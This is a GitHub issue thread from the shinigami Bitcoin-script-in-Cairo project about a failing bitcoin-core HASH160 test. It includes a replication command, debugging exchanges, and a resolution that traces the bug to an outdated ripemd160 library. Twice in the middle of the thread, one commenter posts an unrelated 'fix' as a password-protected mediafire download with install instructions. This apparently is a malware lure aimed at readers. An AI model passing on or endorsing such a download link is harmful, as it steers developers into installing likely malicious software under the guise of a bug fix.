### ISSUE TITLE
[bug] [bitcoin-core test] '1 0x03 0x635168 HASH160 0x14 0xe7309652a8e3f600f06f5d8d52d6df03d2176cc3 EQUAL'

### ISSUE THREAD

**Issue by b-j-roberts** [keep-starknet-strange/shinigami#169]
### Issue

The following bitcoin-core test is failing to give the correct result :
```
ScriptSig: '1 0x03 0x635168' -- ScriptPubKey: 'HASH160 0x14 0xe7309652a8e3f600f06f5d8d52d6df03d2176cc3 EQUAL'
```

This code should be passing, but is failing at the EQUAL operation when comaring the hash of `0x635168` and `0xe7309652a8e3f600f06f5d8d52d6df03d2176cc3`.

### Replicate

To replicate the issue you can use the latest `main` branch with the following command:
```
scarb cairo-run '[[],255075423323795144321713384843195960,15,[127663847454887939587139309636239821098590442427410305476436932866755407920],705277933722573860040595077539208196002227394888750287666836330981441868,30]'
```

**Comment by ShantelPeters** [comment]
Hi @b-j-roberts  I will love to work on this

**Comment by ShantelPeters** [comment]
let me work on this

**Comment by petersdt** [comment]
@b-j-roberts can i work on this

**Comment by PavitraAgarwal21** [comment]
Hey I want to contribute to it , please assign it to me

**Comment by Kaminar-i** [comment]
hello @b-j-roberts let me work on this and get it done asap

**Comment by b-j-roberts** [comment]
Thanks @ShantelPeters , I'll assign you. Please let me know if you cannot get to this soon

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ShantelPeters** [comment]
Thank you @b-j-roberts i will get straight to work .

**Comment by b-j-roberts** [comment]
@ShantelPeters Any luck on this bug? Have you been able to identify where the issue is occuring?

**Comment by ShantelPeters** [comment]
@b-j-roberts this is what I found after a bit of debugging. It seems `a` and `b` are not equal. Do you have any insights into this?

![image](https://github.com/user-attachments/assets/c0404f83-e758-45b9-b585-3dabb7dd51e1)

**Comment by b-j-roberts** [comment]
It seems like the HASH160 of 0x635168 is missing some 0x00 values in the value in pushes onto the stack.

I'd recommend adding some print statements inside the hash160 opcode here : https://github.com/keep-starknet-strange/shinigami/blob/78e6c49b5a6449e8f194e0d6c1b7c301d22932cc/src/opcodes/crypto.cairo#L20
To attempt debugging.

**Comment by ShantelPeters** [comment]
Hi @b-j-roberts still working on it please expect some updates soon.

**Comment by bloomingpeach** [comment]
The error is likely originated from the imported `ripemd160` library, bumping it to latest version resolves this issue.

**Comment by b-j-roberts** [comment]
> The error is likely originated from the imported `ripemd160` library, bumping it to latest version resolves this issue.

Nice find, thank you for submitting the PR!
